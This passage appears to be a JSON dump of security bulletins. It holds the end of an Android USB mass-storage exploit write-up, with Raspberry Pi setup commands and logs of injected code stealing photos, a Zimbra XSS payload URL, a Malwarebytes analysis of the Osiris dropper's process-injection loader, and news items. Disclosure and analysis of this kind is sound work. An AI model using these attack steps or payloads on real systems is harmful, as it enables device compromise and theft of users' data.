com.android.externalstorage\r\n\u2502 \u2514\u2500\u2500 cache\r\n\u2514\u2500\u2500 user_de\r\n \u2514\u2500\u2500 0\r\n \u2514\u2500\u2500 com.android.externalstorage\r\n \u2514\u2500\u2500 code_cache\r\n \r\nThe three [email\u00a0protected] files should have the following contents:\r\n \r\n - [email\u00a0protected]@boot.art should be a copy of system/framework/arm64/boot.art\r\n from the system image.\r\n - [email\u00a0protected]@[email\u00a0protected]@classes.dex\r\n should be the 
generated package.odex.\r\n - [email\u00a0protected]@[email\u00a0protected]@classes.vdex\r\n should be the fixed-up package.vdex.\r\n \r\nCopy the two disk images to the Raspberry Pi Zero W; the fake romfs image should\r\nbe named \"disk_image_blkid\", the image with FAT32 should be named\r\n\"disk_image_mount\". On the Pi, build the fuse_intercept helper:\r\n \r\n$ gcc -Wall fuse_intercept.c `pkg-config fuse --cflags --libs` -o fuse_intercept\r\n \r\nThen create a directory \"mount\" and launch fuse_intercept.\r\n \r\nIn a second terminal, tell the Pi's kernel to present the contents of the mount\r\npoint as a mass storage device:\r\n \r\n[email\u00a0protected]:~ $ sudo modprobe dwc2\r\n[email\u00a0protected]:~ $ sudo modprobe g_mass_storage file=/home/pi/mount/wrapped_image stall=0\r\n \r\n \r\nTo run the attack, connect the Pi to the powered USB hub as a device. Then use\r\na USB-C OTG adapter (unless you have some fancy USB-C hub, I guess?) to connect\r\nthe powered hub to the locked phone, with the phone in USB host mode.\r\n \r\nAt this point, the phone should first mount the USB stick over\r\n/data, then immediately afterwards launch\r\ncom.android.externalstorage/.MountReceiver:\r\n \r\n06-05 21:58:20.988 656 665 I Vold : Filesystem check completed OK\r\n06-05 21:58:20.988 1115 1235 D VoldConnector: RCV <- {656 public:8,97 /mnt/media_rw/../../data}\r\n06-05 21:58:20.990 1115 1235 D VoldConnector: RCV <- {655 public:8,97 /mnt/media_rw/../../data}\r\n06-05 21:58:21.004 1115 1235 D VoldConnector: RCV <- {651 public:8,97 2}\r\n06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:33): avc: denied { write } for name=\"/\" dev=\"sdg1\" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0\r\n06-05 21:58:21.006 1115 1235 D VoldConnector: RCV <- {200 7 Command succeeded}\r\n06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:34): avc: denied { write } for name=\"/\" dev=\"sdg1\" ino=1 
scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0\r\n06-05 21:58:21.008 1335 1335 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,97}:\r\n06-05 21:58:21.008 1335 1335 D StorageNotification: type=PUBLIC diskId=disk:8,96 partGuid=null mountFlags=0 mountUserId=0 \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: state=MOUNTED \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE= \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: path=/mnt/media_rw/../../data internalPath=/mnt/media_rw/../../data \r\n06-05 21:58:21.020 1115 1129 I ActivityManager: Start proc 4478:com.android.externalstorage/u0a35 for broadcast com.android.externalstorage/.MountReceiver\r\n \r\nMost processes can't access the vfat filesystem that is now mounted at /data\r\neither because they lack the necessary groups or because of some SELinux rule.\r\nBut com.android.externalstorage passes both checks and can read and write (but\r\nnot execute) files from the new /data. 
Bytecode is loaded from\r\n/data/dalvik-cache/arm64/[email\u00a0protected]@[email\u00a0protected]@classes.vdex\r\nand then interpreted, allowing the attacker to steal photos from the device\r\n(since com.android.externalstorage has access to /storage/emulated/0):\r\n \r\n06-05 21:58:21.248 4478 4478 I zygote64: The ClassLoaderContext is a special shared library.\r\n06-05 21:58:21.276 4478 4478 W zygote64: JIT profile information will not be recorded: profile file does not exits.\r\n06-05 21:58:21.278 4478 4478 W asset : failed to open idmap file /data/resource-cache/[email\u00a0protected]@[email\u00a0protected]@idmap\r\n06-05 21:58:21.326 4478 4478 D ExternalStorage: After updating volumes, found 3 active roots\r\n06-05 21:58:21.334 4478 4478 E System : MOUNTRECEIVER CODE INJECTED, GRABBING FILES...\r\n06-05 21:58:21.343 4478 4478 E System : GRABBING 'IMG_20180605_212044.jpg'\r\n06-05 21:58:21.419 4478 4478 E System : GRABBING 'IMG_20180605_215031.jpg'\r\n06-05 21:58:21.428 2218 2218 W SQLiteLog: (28) file renamed while open: /data/user/0/com.google.android.gms/databases/config.db\r\n06-05 21:58:21.465 4478 4478 E System : INJECTED CODE DONE\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45192.zip\n\n# 0day.today [2018-08-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30885"}, {"lastseen": "2018-08-12T02:14:50", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Dino Barlattani", "published": "2018-08-11T00:00:00", "title": "Zimbra 8.6.0_GA_1153 - Cross-Site Scripting Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-08-12T02:14:50", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3411"], "modified": "2018-08-11T00:00:00", "id": "1337DAY-ID-30864", "href": "https://0day.today/exploit/description/30864", "sourceData": 
"# Exploit Title: Xss Zimbra Mail server\r\n# Exploit Author: Dinbar78\r\n# Vendor Homepage: https://www.zimbra.com/\r\n \r\n# Version: 8.6.0_GA_1153 (build 20141215151110)\r\n# bug 103609 or CVE-2016-3411\r\n \r\n \r\nPayload: es.\r\nhttps:// (zimbrasite)/h/changepass?skin=\"><script>alert('hacked');</script>\n\n# 0day.today [2018-08-12] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/30864"}], "qualysblog": [{"lastseen": "2018-08-13T20:31:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "WannaCry rears its ugly head again. Reddit gets hacked, despite using two-factor authentication. A cryptojacking campaign targets carrier-grade routers. Here are some recent security industry news that have caught our attention. WannaCry hits Taiwan Semi The notorious WannaCry ransomware re-appeared recently, when Taiwan Semiconductor Manufacturing, a chip supplier to Apple and other smartphone...\n\n[Source](<https://blog.qualys.com/news/2018/08/13/security-news-wannacry-surfaces-in-taiwan-as-reddit-breach-puts-2fa-in-the-spotlight>)", "reporter": "Juan C. 
Perez", "published": "2018-08-13T19:26:48", "type": "qualysblog", "title": "Security News: WannaCry Surfaces in Taiwan, as Reddit Breach Puts 2FA in the Spotlight", "enchantments": {"score": {"modified": "2018-08-13T20:31:03", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-13T19:26:48", "id": "QUALYSBLOG:477807BA00047C747EDC16769667F9D6", "href": "https://blog.qualys.com/news/2018/08/13/security-news-wannacry-surfaces-in-taiwan-as-reddit-breach-puts-2fa-in-the-spotlight", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-08-14T03:12:35", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "One of the Holy Grails for malware authors is a perfect way to impersonate a legitimate process. That would allow them to run their malicious module under cover, unnoticed by antivirus products. Over the years, various techniques have emerged that help them get closer to this goal. This topic is also interesting for researchers and reverse engineers, as it shows creative ways of using Windows APIs.\n\n[Process Doppelg\u00e4nging](<https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/>), a new technique of impersonating a process, was published last year at the [Black Hat conference](<https://www.youtube.com/watch?v=Cch8dvp836w>). After some time, a ransomware named [SynAck was found adopting that technique](<https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/>) for malicious purposes. Even though Process Doppelg\u00e4nging still remains rare in the wild, we recently discovered some of its traits in the dropper for the Osiris banking Trojan ([a new version of the infamous Kronos](<https://www.proofpoint.com/us/threat-insight/post/kronos-reborn>)). 
After closer examination, we found out that the original technique was further customized.\n\nIndeed, the malware authors have merged elements from both Process Doppelg\u00e4nging and Process Hollowing, picking the best parts of both techniques to create a more powerful combo. In this post, we take a closer look at how Osiris is deployed on victim machines, thanks to this interesting loader.\n\n### Overview\n\nOsiris is loaded in three steps as pictured in the diagram below:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/diagram_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/diagram_.png> \"\" )\n\nThe first stage loader is the one that was inspired by the Process Doppelg\u00e4nging technique but with an unexpected twist. Finally, Osiris proper is delivered thanks to a second stage loader.\n\n### Loading additional NTDLL\n\nWhen run, the initial dropper creates a new suspended process, wermgr.exe.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/dropper_run-1.png)\n\nLooking into the modules loaded within the injector's process space, we can see this additional copy of NTDLL:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/added_ntdll-1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/added_ntdll-1_.png> \"\" )\n\nThis is a well-known technique that some malware authors use in order to evade monitoring applications and hide the API calls that they use. When we closely examine what functions are called from that additional NTDLL, we find more interesting details. It calls several APIs related to NTFS transactions. It was easy to guess that the technique of Process Doppelg\u00e4nging, which relies on this mechanism, was applied here.\n\nNTDLL is a special, low-level DLL. Basically, it is just a wrapper around [syscalls](<https://en.wikipedia.org/wiki/System_call>). It does not have any dependencies on other DLLs in the system. 
Thanks to this, it can be loaded conveniently, without the need to fill its import table.\n\nOther system DLLs, such as Kernel32, rely heavily on functions exported from NTDLL. This is why many user-land monitoring tools hook and intercept the functions exported by NTDLL: to watch what functions are being called and check whether the process displays any suspicious activity.\n\nOf course malware authors know about this, so sometimes, in order to fool this mechanism, they load their own, fresh and unhooked copy of NTDLL from disk. There are several ways to implement this. Let's have a look at how the authors of the Osiris dropper did it.\n\nLooking at the memory mapping, we see that the additional NTDLL is loaded as an image, just like other DLLs. This type of mapping is typical for DLLs loaded by the `LoadLibrary` function or its low-level version from NTDLL, `LdrLoadDll`. But NTDLL is loaded by default in every executable, and loading the same DLL twice is impossible via the official API.\n\nUsually, malware authors decide to map the second copy manually, but that gives a different mapping type and stands out from the normally-loaded DLLs. Here, the authors made a workaround: they loaded the file as a section, using the following functions:\n\n * `ntdll.NtCreateFile` - to open the ntdll.dll file\n * `ntdll.[NtCreateSection](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/nf-wdm-zwcreatesection>)` - to create a section out of this file\n * `ntdll.ZwMapViewOfSection` - to map this section into the process address space\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_and_map_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_and_map_.png> \"\" )\n\nThis was a smart move because the DLL is mapped as an image, so it looks like it was loaded in a typical way.\n\nThis DLL was further used to make the payload injection more stealthy. 
Having their fresh copy of NTDLL, they were sure that the functions used from there are not hooked by security products.\n\n#### Comparison with Process Doppelg\u00e4nging and Process Hollowing\n\nThe way in which the loader injects the payload into a new process displays some significant similarities with Process Doppelg\u00e4nging. However, if we analyze it very carefully, we can also see differences from the classic implementation proposed last year at Black Hat. The differing elements are closer to Process Hollowing.\n\nClassic Process Doppelg\u00e4nging:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/dopel1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/dopel1_.png> \"\" )\n\nProcess Hollowing:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/hollowing1-1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/hollowing1-1_.png> \"\" )\n\nOsiris Loader:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/osildr1-2_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/osildr1-2_.png> \"\" )\n\n### Creating a new process\n\nThe Osiris loader starts by creating the process into which it is going to inject. The process is created by a function from Kernel32: CreateProcessInternalW:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_process_internal_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_process_internal_.png> \"\" )\n\nThe new process (wermgr.exe) is created in a suspended state from the original file. 
So far, it reminds us of Process Hollowing, a much older technique of process impersonation.\n\nIn the Process Doppelg\u00e4nging algorithm, the step of creating the new process is taken much later and uses a different, undocumented API: NtCreateProcessEx:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_process_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_process_.png> \"\" )\n\nThis difference is significant, because in Process Doppelg\u00e4nging, the new process is created not from the original file, but from a special buffer (section). This section was supposed to be created earlier, using an \"invisible\" file created within the NTFS transaction. In the Osiris loader, this part also occurs, but the order is turned upside down, making us question whether we can call it the same algorithm.\n\nAfter the process is created, the same image (wermgr.exe) is mapped into the context of the loader, just like it was previously done with NTDLL.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/mapped_wermgr_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/mapped_wermgr_.png> \"\" )\n\nAs it later turns out, the loader will patch the remote process. The local copy of the wermgr.exe will be used to gather information about where the patches should be applied.\n\n### Usage of NTFS transactions\n\nLet's start by having a brief look at what NTFS transactions are. This mechanism is commonly used while operating on databases\u2014in a similar way, they exist in the NTFS file system. NTFS transactions encapsulate a series of operations into a single unit. When a file is created inside the transaction, nothing from outside can have access to it until the transaction is committed. Process Doppelg\u00e4nging uses them in order to create invisible files where the payload is dropped.\n\nIn the analyzed case, the usage of NTFS transactions is exactly the same. 
We can spot only small differences in the APIs used. The loader creates a new transaction, within which a new file is created. The original implementation used `CreateTransaction` and `CreateFileTransacted` from Kernel32. Here, they were substituted by low-level equivalents. \n\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/set_current_transaction_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/set_current_transaction_.png> \"\" )\n\nFirst, the function `ZwCreateTransaction` from NTDLL is called. Then, instead of `CreateFileTransacted`, the authors [open the transacted file](<http://microsoft.public.win32.programmer.kernel.narkive.com/MH2k9XfA/ntfs-transaction-using-native-functions-in-user-mode>) by `RtlSetCurrentTransaction` along with `ZwCreateFile` (the created file is %TEMP%\\\\\\Liebert.bmp). Then, the dropper writes a buffer into the file. Analogously, `RtlSetCurrentTransaction` with `ZwWriteFile` is used.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/write_file-1_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/write_file-1_.png> \"\" )\n\nWe can see that the buffer that is being written contains the new PE file: the second stage payload. Typically for this technique, the file is visible only within the transaction and cannot be opened by other processes, such as AV scanners.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_section_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/create_section_.png> \"\" )\n\nThis transacted file is then used to create a section. The function that can do it is available only via the low-level API: ZwCreateSection/NtCreateSection.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/rollback_transaction_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/rollback_transaction_.png> \"\" )\n\nAfter the section is created, that file is no longer needed. 
The transaction gets rolled back (by `ZwRollbackTransaction`), and the changes to the file are never saved on the disk.\n\nSo, the part described above is identical to the analogous part of Process Doppelg\u00e4nging. Authors of the dropper made it even more stealthy by using low-level equivalents of the functions, called from a custom copy of NTDLL.\n\n### From a section to a process\n\nAt this point, the Osiris dropper has created two completely unrelated elements:\n\n * A process (at this moment containing a mapped, legitimate executable wermgr.exe)\n * A section (created from the transacted file) containing the malicious payload\n\nIf this were typical Process Doppelg\u00e4nging, this situation would never occur, and we would have the process created directly based on the section with the mapped payload. So, the question arises, how did the author of the dropper decide to merge the elements together at this point?\n\nIf we trace the execution, we can see the following functions being called, just after the transaction is rolled back (format: RVA;function):\n \n \n 4b1e6;ntdll_1.ZwQuerySection\n 4b22b;ntdll.NtClose\n 4b239;ntdll.NtClose\n 4aab8;ntdll_1.ZwMapViewOfSection\n 4af27;ntdll_1.ZwProtectVirtualMemory\n 4af5b;ntdll_1.ZwWriteVirtualMemory\n 4af8a;ntdll_1.ZwProtectVirtualMemory\n 4b01c;ntdll_1.ZwWriteVirtualMemory\n 4b03a;ntdll_1.ZwResumeThread\n \n\nSo, it looks like the newly created section is just mapped into the new process as an additional module. After writing the payload into memory and setting the necessary patches, such as Entry Point redirection, the process is resumed:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/resume_proc_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/resume_proc_.png> \"\" )\n\nThe way in which the execution was redirected looks similar to variants of Process Hollowing. 
[The PEB of the remote process is patched](<https://github.com/hasherezade/demos/blob/master/run_pe/src/runpe.h#L127>), and the new module base is set to the added section. (Thanks to this, imports will get loaded automatically when the process resumes.)\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/patching_peb_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/patching_peb_.png> \"\" )\n\nThe Entry Point redirection is, however, done just by a patch at the Entry Point address of the original module. A single jump redirects to the Entry Point of the injected module:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/patched_ep-1.png)\n\nIn case patching the Entry Point has failed, the loader contains a second variant of Entry Point redirection, by setting the new address in the thread context (ZwGetThreadContext -> ZwSetThreadContext), which is [a classic technique used in Process Hollowing](<https://github.com/hasherezade/demos/blob/master/run_pe/src/runpe.h#L139>):\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/set_context_-1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/set_context_-1.png> \"\" )\n\n### Best of both worlds\n\nAs we can see, the author merged some elements of Process Doppelg\u00e4nging with some elements of Process Hollowing. This choice was not accidental. Both of those techniques have strong and weak points, but by merging them together, we get a powerful combo.\n\nThe weakest point of Process Hollowing is the protection rights set on the memory space where the payload is injected (more info [here](<https://youtu.be/Cch8dvp836w?t=569>)). Process Hollowing allocates memory pages in the remote process by VirtualAllocEx, then writes the payload there. 
It gives one undesirable effect: the memory type (MEM_PRIVATE) is different from that of a normally loaded executable (MEM_IMAGE).\n\nExample of a payload loaded using Process Hollowing:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/hollowing_example-2.png)\n\nThe major obstacle in loading the payload as an image is that, to do so, it has to be first dropped on the disk. Of course we cannot do this, because once dropped, it would easily be picked up by an antivirus.\n\nProcess Doppelg\u00e4nging on the other hand provides a solution: invisible transacted files, where the payload can be safely dropped without being noticed. This technique assumes that the transacted file will be used to create a section (MEM_IMAGE), and then this section will become the base of the new process ([using NtCreateProcessEx](<https://github.com/hasherezade/process_doppelganging/blob/master/main.cpp#L196>)).\n\nExample of a payload loaded using Process Doppelg\u00e4nging:\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/doppel_example.png)\n\nThis solution works well, but requires that all the process parameters also be loaded manually: first creating them by [RtlCreateProcessParametersEx and then setting them into the remote PEB](<https://github.com/hasherezade/process_doppelganging/blob/master/main.cpp#L76>). This made it difficult to run a 32-bit process on a 64-bit system, because in the case of WoW64 processes, there are 2 PEBs to be filled.\n\nThose problems of Process Doppelg\u00e4nging can be solved easily if we create the process just like Process Hollowing does it. Rather than using the low-level API, which was the only way to create a new process out of a section, the authors created a process out of the legitimate file, using a documented API from Kernel32. 
Yet, the section carrying the payload, loaded with proper access rights (MEM_IMAGE), can be added later, and the execution can get redirected to it.\n\n### Second stage loader\n\nThe next layer ([8d58c731f61afe74e9f450cc1c7987be](<https://www.virustotal.com/#/file/40288538ec1b749734cb58f95649bd37509281270225a87597925f606c013f3a/details>)) is not the core yet, but the next stage of the loader. It imports only one DLL, Kernel32.\n\nIts only role is to load the final payload. At this stage, we can hardly find anything innovative. The Osiris core is unpacked piece by piece and manually loaded along with its dependencies into a newly-allocated memory area within the loader process.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/final_payload_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/final_payload_.png> \"\" )\n\nAfter this self-injection, the loader jumps into the payload's entry point:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/payload_entry_point_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/payload_entry_point_.png> \"\" )\n\nThe interesting thing is that the application's entry point is different from the entry point saved in the header. So, if we dump the payload and try to run it independently, we will not get the same code executed. 
This is an interesting technique used to mislead researchers.\n\nThe entry point that was set in the headers is at RVA 0x26840:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/original_ep_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/original_ep_.png> \"\" )\n\nThe call leads to a function that makes the application go into an infinite sleep loop:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/fake_ep_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/fake_ep_.png> \"\" )\n\nThe real entry point, from which the execution of the malware should start, is at 0x25386, and it is known only to the loader.\n\n#### [![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/osiris_ep_code_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/osiris_ep_code_.png> \"\" )\n\n### The second stage versus Kronos loader\n\nA similar trick using a hidden entry point was used by the original Kronos ([2a550956263a22991c34f076f3160b49](<https://www.hybrid-analysis.com/sample/8389dd850c991127f3b3402dce4201cb693ec0fb7b1e7663fcfa24ef30039851?environmentId=100>)). In Kronos' case, the final payload is injected into svchost. 
The execution is redirected to the core by patching the entry point in svchost:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/svchost_patch_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/svchost_patch_.png> \"\" )\n\nIn this case, the entry point within the payload is at RVA 0x13B90, while the entry point saved in the payload's header ([d8425578fc2d84513f1f22d3d518e3c3](<https://www.virustotal.com/#/file/258d67283afa5195436b1eaa8d02953785974d3709109ebff3b9b638332df514/details>)) is at 0x15002.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/kronos_ep_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/kronos_ep_.png> \"\" )\n\nThe code at the real Kronos entry point displays similarities with the analogous point in Osiris. Yet, we can see they are not identical:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2018/08/kronos_ep_code_.png)](<https://blog.malwarebytes.com/wp-content/uploads/2018/08/kronos_ep_code_.png> \"\" )\n\n### A precision implementation\n\nThe first stage loader is strongly inspired by Process Doppelg\u00e4nging and is implemented in a clean and professional way. The author adopted elements from a relatively new technique and made the best out of it by composing it with other known tricks. The precision used here reminds us of the code used in the original Kronos. However, we can't be sure if the first layer is written by the same author as the core bot. Malware distributors often use [third-party crypters](<https://blog.malwarebytes.com/threat-analysis/2015/12/malware-crypters-the-deceptive-first-layer/>) to pack their malware. 
The second stage is more tightly coupled with the payload, and here we can say with more confidence that this layer was prepared along with the core.\n\n[Malwarebytes](<https://www.malwarebytes.com/>) can protect against this threat early on by breaking its distribution chains, which include malicious documents sent in spam campaigns and drive-by downloads, thanks to our anti-exploit module. Additionally, our anti-malware engine detects both the dropper and the Osiris core.\n\n### Indicators of Compromise (IOCs)\n\nStage 1 (original sample)\n \n \n e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0\n\nStage 2 (second stage loader)\n \n \n 40288538ec1b749734cb58f95649bd37509281270225a87597925f606c013f3a\n\nOsiris (core bot)\n \n \n d98a9c5b4b655c6d888ab4cf82db276d9132b09934a58491c642edf1662e831e\n\nThe post [Process Doppelg\u00e4nging meets Process Hollowing in Osiris dropper](<https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "hasherezade", "published": "2018-08-13T18:29:57", "type": "malwarebytes", "title": "Process Doppelg\u00e4nging meets Process Hollowing in Osiris dropper", "enchantments": {"score": {"modified": "2018-08-14T03:12:35", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-13T18:29:57", "id": "MALWAREBYTES:B94255EB54B5F64CE41413CE6220743C", "href": "https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-13T23:12:07", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Last week, we published a [review of exploit kits](<https://blog.malwarebytes.com/threat-analysis/2018/08/exploit-kits-summer-2018-review/>), talked about 
everyday tech that can [give you a headache](<https://blog.malwarebytes.com/101/2018/08/8-everyday-technologies-that-can-make-you-vulnerable-to-cyberattacks/>), and showed how to [protect RDP access](<https://blog.malwarebytes.com/security-world/business-security-world/2018/08/protect-rdp-access-ransomware-attacks/>) from ransomware. We also published a study on the [true cost of cybercrime](<https://blog.malwarebytes.com/security-world/2018/08/white-hat-black-hat-emergence-gray-hat-true-costs-cybercrime/>).\n\n### Other news:\n\n * Discovered at Black Hat: WhatsApp \"[message manipulation](<https://www.theregister.co.uk/2018/08/09/whatsapp_message_manipulation/>)\" (Source: The Register)\n * Discovered at Black Hat: [AI attacks](<https://www.theregister.co.uk/2018/08/09/neural_network_malware/>) (Source: The Register)\n * Once again, discovered at Black Hat: [Meltdown panel](<https://www.theregister.co.uk/2018/08/09/meltdown_spectre_cert_timing/>) (Source: The Register)\n * Indeed, discovered at Black Hat: [Mobile payment bugs](<https://www.theregister.co.uk/2018/08/10/mobile_pos_insecurity/>) (Source: The Register)\n * PGA [ransomware attack](<https://golfweek.com/2018/08/08/hackers-target-pga-servers-seek-bitcoin-ransom/>) right before Ryder Cup (Source: Golf Week)\n * Steer clear of [evil JavaScript](<https://blog.apnic.net/2018/08/07/discovering-evasive-code-in-malicious-websites/>) (Source: APNIC)\n * Adding bugs to [deter attackers](<https://arxiv.org/pdf/1808.00659.pdf>) [PDF] (Source: Arxiv)\n * Botnets and [irrigation systems](<https://www.helpnetsecurity.com/2018/08/09/botnet-smart-irrigation-systems/>) (Source: Help Net Security)\n * Hunting [Twitter bots](<https://duo.com/assets/pdf/Duo-Labs-Dont-At-Me-Twitter-Bots.pdf>) at scale (Source: Duo Security)\n * Google to warn of [government-backed attacks](<https://gsuiteupdates.googleblog.com/2018/08/control-government-backed-attack-alerts.html>) (Source: G Suite)\n\nStay safe, everyone!\n\nThe post [A 
week in security (August 6 \u2013 August 12)](<https://blog.malwarebytes.com/security-world/2018/08/week-security-august-6-12/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Malwarebytes Labs", "published": "2018-08-13T16:37:10", "type": "malwarebytes", "title": "A week in security (August 6 \u2013 August 12)", "enchantments": {"score": {"modified": "2018-08-13T23:12:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-13T16:37:10", "id": "MALWAREBYTES:A5CC3E29981C1A5864EF7560E3EA5F63", "href": "https://blog.malwarebytes.com/security-world/2018/08/week-security-august-6-12/", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-08-14T05:12:46", "_object_types": ["robots.models.base.Bulletin", "robots.models.thn.ThnBulletin"], "references": [], "description": "[![programmatic macos mouse click hacking](https://1.bp.blogspot.com/-pMWGpuhsNlw/W3JiuDibBGI/AAAAAAAAx1U/-b18pUk_ZpEfGfxWkt0psycebUfXXn4NgCLcBGAs/s728-e100/macos-mouse-click-hacking.png)](<https://1.bp.blogspot.com/-pMWGpuhsNlw/W3JiuDibBGI/AAAAAAAAx1U/-b18pUk_ZpEfGfxWkt0psycebUfXXn4NgCLcBGAs/s728-e100/macos-mouse-click-hacking.png>)\n\nYour Mac computer running Apple's latest High Sierra operating system can be hacked by tweaking just two lines of code, a researcher demonstrated at the Def Con security conference on Sunday. \n \nPatrick Wardle, an ex-NSA hacker and now Chief Research Officer of Digita Security, uncovered a critical zero-day vulnerability in the macOS operating system that could allow a malicious application installed on the targeted system to virtually \"click\" objects without any user interaction or consent. \n \nTo understand how dangerous this can be, Wardle [explains](<https://speakerdeck.com/patrickwardle/the-mouse-is-mightier-than-the-sword>): \"Via a single click, countless security mechanisms may be completely bypassed. 
Run untrusted app? Click...allowed. Authorize keychain access? Click...allowed. Load 3rd-party kernel extension? Click...allowed. Authorize outgoing network connection? click ...allowed.\" \n\n\n \nWardle described his research into \"synthetic\" interactions with a user interface (UI) as \"The Mouse is Mightier than the Sword,\" showcasing an attack that's capable of 'synthetic clicks'\u2014programmatic and invisible mouse clicks that are generated by a software program rather than a human. \n \nmacOS itself offers synthetic clicks as an accessibility feature for disabled people to interact with the system interface in non-traditional ways, but Apple has put some limitations in place to block malware from abusing these programmed clicks. \n\n\n[![hacking with mac os](https://1.bp.blogspot.com/-wlyLZozlX6g/W3JjZCUnheI/AAAAAAAAx1c/6Nsk87-aqBkMkqXDpZSb0t1-YBu1EdkmgCLcBGAs/s728-e100/hacking-macos.png)](<https://1.bp.blogspot.com/-wlyLZozlX6g/W3JjZCUnheI/AAAAAAAAx1c/6Nsk87-aqBkMkqXDpZSb0t1-YBu1EdkmgCLcBGAs/s728-e100/hacking-macos.png>)\n\n \nWardle accidentally discovered that High Sierra incorrectly interprets two consecutive synthetic mouse \"down\" events as a legitimate click, allowing attackers to programmatically interact with security 